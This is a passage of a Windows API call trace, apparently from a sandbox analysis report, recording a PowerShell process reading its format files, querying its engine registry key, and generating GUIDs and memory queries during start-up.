[1]=0xc0, [2]=0xa4, [3]=0x86, [4]=0x3c, [5]=0x3e, [6]=0xf9, [7]=0x1))) returned 0x0 [0252.079] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x4e158791, Data2=0x9fc1, Data3=0x4a44, Data4=([0]=0x9a, [1]=0x8c, [2]=0x8c, [3]=0xe8, [4]=0x9f, [5]=0xb1, [6]=0x3b, [7]=0x49))) returned 0x0 [0252.082] SetErrorMode (uMode=0x1) returned 0x1 [0252.083] SetErrorMode (uMode=0x1) returned 0x1 [0252.083] GetFileType (hFile=0x310) returned 0x1 [0252.083] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.086] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.088] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.088] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.089] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.089] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.090] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.090] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.091] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.092] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.092] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.093] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.093] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.093] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.094] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.094] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.096] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.096] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0xbce, lpOverlapped=0x0) returned 1 [0252.096] ReadFile (in: hFile=0x310, lpBuffer=0x3683116, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3683116*, lpNumberOfBytesRead=0x16ccf8*=0x0, lpOverlapped=0x0) returned 1 [0252.096] ReadFile (in: hFile=0x310, lpBuffer=0x36839e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x36839e0*, lpNumberOfBytesRead=0x16ccf8*=0x0, lpOverlapped=0x0) returned 1 [0252.097] CloseHandle (hObject=0x310) returned 1 [0252.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0252.097] SetErrorMode (uMode=0x1) returned 0x1 [0252.097] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cca0 | out: lpFileInformation=0x16cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0252.097] SetErrorMode (uMode=0x1) returned 0x1 [0252.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0252.099] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cd88 | out: phkResult=0x16cd88*=0x310) returned 0x0 [0252.099] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cd0c, lpData=0x0, lpcbData=0x16cd08*=0x0 | out: lpType=0x16cd0c*=0x1, lpData=0x0, lpcbData=0x16cd08*=0x56) returned 0x0 [0252.099] CoTaskMemAlloc (cb=0x5a) returned 0x37a1a0 [0252.099] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16ccdc, lpData=0x37a1a0, lpcbData=0x16ccd8*=0x56 | out: lpType=0x16ccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ccd8*=0x56) returned 0x0 [0252.099] CoTaskMemFree (pv=0x37a1a0) [0252.100] RegCloseKey (hKey=0x310) returned 0x0 [0252.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0252.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0252.107] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xfbbbc2a0, Data2=0x4a5c, Data3=0x4c10, Data4=([0]=0xa7, [1]=0xb7, [2]=0xb2, [3]=0xa5, [4]=0xc5, [5]=0xc1, [6]=0x4b, [7]=0x38))) returned 0x0 [0252.110] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x4e46208c, Data2=0xf139, Data3=0x4e6b, Data4=([0]=0xb7, [1]=0x2c, [2]=0xa, [3]=0x2e, [4]=0xd6, [5]=0xd6, [6]=0x3e, [7]=0xa))) returned 0x0 [0252.112] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xcdf68baa, Data2=0x37c3, Data3=0x4388, Data4=([0]=0xa5, [1]=0x91, [2]=0x25, [3]=0xfb, [4]=0xe5, [5]=0xb5, [6]=0xc2, [7]=0x83))) returned 0x0 [0252.114] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x9e99cf5d, Data2=0x3e42, Data3=0x48f8, Data4=([0]=0xa1, [1]=0xcf, [2]=0x44, [3]=0x5c, [4]=0xc7, [5]=0x69, [6]=0xf9, [7]=0xc7))) returned 0x0 [0252.116] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x16f09ba8, Data2=0x58d9, Data3=0x4de4, Data4=([0]=0xb4, [1]=0x8e, [2]=0x75, [3]=0xf7, [4]=0x44, [5]=0x88, [6]=0xe9, [7]=0xfb))) returned 0x0 [0252.117] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xd9f9f38e, Data2=0xcf5, Data3=0x4e03, Data4=([0]=0x88, [1]=0xe7, [2]=0x25, [3]=0xfb, [4]=0x33, [5]=0xf4, [6]=0x15, [7]=0x90))) returned 0x0 [0252.119] VirtualQuery (in: lpAddress=0x16b960, lpBuffer=0x16c820, dwLength=0x30 | out: lpBuffer=0x16c820*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.121] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x9b9bf2ae, Data2=0x728f, Data3=0x445e, Data4=([0]=0xad, [1]=0xef, [2]=0x98, [3]=0x8b, [4]=0x8d, [5]=0x9f, [6]=0xc6, [7]=0x3c))) returned 0x0 [0252.122] VirtualQuery (in: lpAddress=0x16b960, lpBuffer=0x16c820, dwLength=0x30 | out: lpBuffer=0x16c820*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.125] VirtualQuery (in: lpAddress=0x16b960, lpBuffer=0x16c820, dwLength=0x30 | out: lpBuffer=0x16c820*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.128] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x6ba5168d, Data2=0xeb9a, Data3=0x4f23, Data4=([0]=0x95, [1]=0x41, [2]=0x2a, [3]=0x68, [4]=0xc9, [5]=0xd9, [6]=0xb, [7]=0xa5))) returned 0x0 [0252.131] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x47da055, Data2=0xfeb3, Data3=0x47d4, Data4=([0]=0x98, [1]=0x69, [2]=0xa6, [3]=0x4f, [4]=0x79, [5]=0x31, [6]=0xb5, [7]=0x8d))) returned 0x0 [0252.132] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xd839d792, Data2=0xb626, Data3=0x49db, Data4=([0]=0x87, [1]=0xf2, [2]=0x6a, [3]=0xd4, [4]=0x86, [5]=0xd9, [6]=0x90, [7]=0x1f))) returned 0x0 [0252.134] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x7481dd40, Data2=0xd59, Data3=0x4a9b, Data4=([0]=0x8a, [1]=0xfe, [2]=0x8a, [3]=0xdd, [4]=0xc4, [5]=0x38, [6]=0x49, [7]=0x12))) returned 0x0 [0252.135] VirtualQuery (in: lpAddress=0x16b960, lpBuffer=0x16c820, dwLength=0x30 | out: lpBuffer=0x16c820*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.136] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x37d635bd, Data2=0x4d2, Data3=0x42d9, Data4=([0]=0xa9, [1]=0x64, [2]=0xc0, [3]=0x36, [4]=0x4a, [5]=0xda, [6]=0x24, [7]=0xab))) returned 0x0 [0252.138] VirtualQuery (in: lpAddress=0x16b960, lpBuffer=0x16c820, dwLength=0x30 | out: lpBuffer=0x16c820*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.140] VirtualQuery (in: lpAddress=0x16b960, lpBuffer=0x16c820, dwLength=0x30 | out: lpBuffer=0x16c820*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.143] VirtualQuery (in: lpAddress=0x16b960, lpBuffer=0x16c820, dwLength=0x30 | out: lpBuffer=0x16c820*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.145] VirtualQuery (in: lpAddress=0x16b960, lpBuffer=0x16c820, dwLength=0x30 | out: lpBuffer=0x16c820*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.147] VirtualQuery (in: lpAddress=0x16b960, lpBuffer=0x16c820, dwLength=0x30 | out: lpBuffer=0x16c820*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.151] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x3d338b8e, Data2=0xfbe0, Data3=0x4238, Data4=([0]=0x9c, [1]=0xa4, [2]=0x1e, [3]=0xb2, [4]=0x69, [5]=0xa, [6]=0xb5, [7]=0xa5))) returned 0x0 [0252.153] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xa28ad253, Data2=0x10db, Data3=0x4792, Data4=([0]=0x8c, [1]=0xfe, [2]=0x45, [3]=0x65, [4]=0xdf, [5]=0x99, [6]=0x43, [7]=0x5f))) returned 0x0 [0252.155] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xa45e4cf4, Data2=0x32e0, Data3=0x40e4, Data4=([0]=0xb0, [1]=0x86, [2]=0xcf, [3]=0x8b, [4]=0xd9, [5]=0xc3, [6]=0x46, [7]=0x1a))) returned 0x0 [0252.157] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x9473b015, Data2=0xdfd, Data3=0x4130, Data4=([0]=0xba, [1]=0x4b, [2]=0x1a, [3]=0xd1, [4]=0x5a, [5]=0x5c, [6]=0x59, [7]=0x8c))) returned 0x0 [0252.159] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xa906a5f0, Data2=0x2d88, Data3=0x4d20, Data4=([0]=0xa8, [1]=0x29, [2]=0x26, [3]=0xb3, [4]=0xbe, [5]=0x77, [6]=0xf, [7]=0xe))) returned 0x0 [0252.160] VirtualQuery (in: lpAddress=0x16bc20, lpBuffer=0x16cae0, dwLength=0x30 | out: lpBuffer=0x16cae0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.162] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x36e65382, Data2=0xa428, Data3=0x476f, Data4=([0]=0x91, [1]=0xe9, [2]=0x9c, [3]=0xfc, [4]=0xc5, [5]=0x2e, [6]=0x23, [7]=0x33))) returned 0x0 [0252.164] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x3042f313, Data2=0xad81, Data3=0x47fe, Data4=([0]=0x81, [1]=0x7, [2]=0x7b, [3]=0xd5, [4]=0xf3, [5]=0xcc, [6]=0xe9, [7]=0x9a))) returned 0x0 [0252.166] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x25781c67, Data2=0x8099, Data3=0x4a7b, Data4=([0]=0xbc, [1]=0x7c, [2]=0xdd, [3]=0x63, [4]=0xb9, [5]=0x5c, [6]=0x1c, [7]=0xc1))) returned 0x0 [0252.168] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xede51eae, Data2=0xf8eb, Data3=0x4b04, Data4=([0]=0xa5, [1]=0xd7, [2]=0xa, [3]=0xb, [4]=0xb, [5]=0x95, [6]=0xe4, [7]=0x5c))) returned 0x0 [0252.171] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xe9149acc, Data2=0x84c7, Data3=0x4d7a, Data4=([0]=0x87, [1]=0xff, [2]=0x2a, [3]=0xd7, [4]=0x5e, [5]=0x36, [6]=0x73, [7]=0x25))) returned 0x0 [0252.173] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x3ba93a09, Data2=0x6438, Data3=0x4a19, Data4=([0]=0xbe, [1]=0xa8, [2]=0x48, [3]=0x73, [4]=0x54, [5]=0x1d, [6]=0xb3, [7]=0xd5))) returned 0x0 [0252.174] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x69e5275d, Data2=0x1c29, Data3=0x4b1c, Data4=([0]=0xb1, [1]=0x75, [2]=0x37, [3]=0xe2, [4]=0x8d, [5]=0xc5, [6]=0xf4, [7]=0x40))) returned 0x0 [0252.176] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x31559c5a, Data2=0x2b15, Data3=0x4892, Data4=([0]=0x8c, [1]=0x24, [2]=0x51, [3]=0x22, [4]=0xc9, [5]=0x56, [6]=0x94, [7]=0xf3))) returned 0x0 [0252.178] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x3d0c3750, Data2=0x73dc, Data3=0x4cd4, Data4=([0]=0x98, [1]=0xb4, [2]=0x22, [3]=0xa4, [4]=0x1c, [5]=0xbf, [6]=0xe5, [7]=0xde))) returned 0x0 [0252.180] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xaebd2901, Data2=0xf1b2, Data3=0x4d94, Data4=([0]=0x89, [1]=0xae, [2]=0xf1, [3]=0xfb, [4]=0xbf, [5]=0xf1, [6]=0x8, [7]=0xcf))) returned 0x0 [0252.182] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xe78c99a5, Data2=0x677, Data3=0x4262, Data4=([0]=0x8e, [1]=0xd5, [2]=0xa, [3]=0x70, [4]=0xa, [5]=0x8f, [6]=0x77, [7]=0xed))) returned 0x0 [0252.183] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xfd825040, Data2=0x7f50, Data3=0x43d6, Data4=([0]=0xbe, [1]=0xa2, [2]=0x93, [3]=0xf2, [4]=0x5e, [5]=0xde, [6]=0x55, [7]=0xdf))) returned 0x0 [0252.185] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x607af7f, Data2=0xe779, Data3=0x4f5d, Data4=([0]=0xa4, [1]=0x23, [2]=0xd9, [3]=0xb0, [4]=0xfa, [5]=0x45, [6]=0xe9, [7]=0xae))) returned 0x0 [0252.186] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x8693584a, Data2=0xd689, Data3=0x44b1, Data4=([0]=0xab, [1]=0xf, [2]=0x30, [3]=0x33, [4]=0x35, [5]=0x83, [6]=0x6d, [7]=0xc))) returned 0x0 [0252.188] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xf8c3beb1, Data2=0xddef, Data3=0x488a, Data4=([0]=0x93, [1]=0x51, [2]=0xc3, [3]=0xfa, [4]=0x48, [5]=0x64, [6]=0xbc, [7]=0xf0))) returned 0x0 [0252.190] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xf1d31077, Data2=0xb402, Data3=0x450d, Data4=([0]=0x89, [1]=0xd7, [2]=0x72, [3]=0x27, [4]=0x3, [5]=0x44, [6]=0x72, [7]=0x20))) returned 0x0 [0252.192] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x3030448f, Data2=0x8412, Data3=0x4d6a, Data4=([0]=0x8d, [1]=0xdd, [2]=0xa9, [3]=0xad, [4]=0x0, [5]=0x74, [6]=0x80, [7]=0xef))) returned 0x0 [0252.193] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x165b7e70, Data2=0xb152, Data3=0x4e2f, Data4=([0]=0x88, [1]=0xec, [2]=0x63, [3]=0x9d, [4]=0xce, [5]=0xd6, [6]=0x63, [7]=0xc9))) returned 0x0 [0252.195] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xd063ff09, Data2=0x4b3a, Data3=0x4970, Data4=([0]=0xa8, [1]=0xa5, [2]=0x66, [3]=0xa4, [4]=0xb3, [5]=0x94, [6]=0xb5, [7]=0x85))) returned 0x0 [0252.197] VirtualQuery (in: lpAddress=0x16b960, lpBuffer=0x16c820, dwLength=0x30 | out: lpBuffer=0x16c820*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.199] VirtualQuery (in: lpAddress=0x16b960, lpBuffer=0x16c820, dwLength=0x30 | out: lpBuffer=0x16c820*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.208] VirtualQuery (in: lpAddress=0x16b960, lpBuffer=0x16c820, dwLength=0x30 | out: lpBuffer=0x16c820*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.214] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xe86a1ef8, Data2=0x7e61, Data3=0x4d38, Data4=([0]=0x9f, [1]=0xb8, [2]=0xbc, [3]=0x4f, [4]=0xf3, [5]=0xf0, [6]=0xf3, [7]=0xe4))) returned 0x0 [0252.214] SetErrorMode (uMode=0x1) returned 0x1 [0252.215] SetErrorMode (uMode=0x1) returned 0x1 [0252.215] GetFileType (hFile=0x310) returned 0x1 [0252.215] ReadFile (in: hFile=0x310, lpBuffer=0x3793fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3793fc8*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.225] ReadFile (in: hFile=0x310, lpBuffer=0x3793fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3793fc8*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.225] ReadFile (in: hFile=0x310, lpBuffer=0x3793fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3793fc8*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.225] ReadFile (in: hFile=0x310, lpBuffer=0x3793fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3793fc8*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.226] ReadFile (in: hFile=0x310, lpBuffer=0x3793fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3793fc8*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.226] ReadFile (in: hFile=0x310, lpBuffer=0x3793fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3793fc8*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.227] ReadFile (in: hFile=0x310, lpBuffer=0x3793fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3793fc8*, lpNumberOfBytesRead=0x16ccf8*=0x119, lpOverlapped=0x0) returned 1 [0252.227] ReadFile (in: hFile=0x310, lpBuffer=0x3793fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x3793fc8*, lpNumberOfBytesRead=0x16ccf8*=0x0, lpOverlapped=0x0) returned 1 [0252.227] CloseHandle (hObject=0x310) returned 1 [0252.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0252.228] SetErrorMode (uMode=0x1) returned 0x1 [0252.228] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cca0 | out: lpFileInformation=0x16cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0252.229] SetErrorMode (uMode=0x1) returned 0x1 [0252.229] GetFullPathNameW (in: 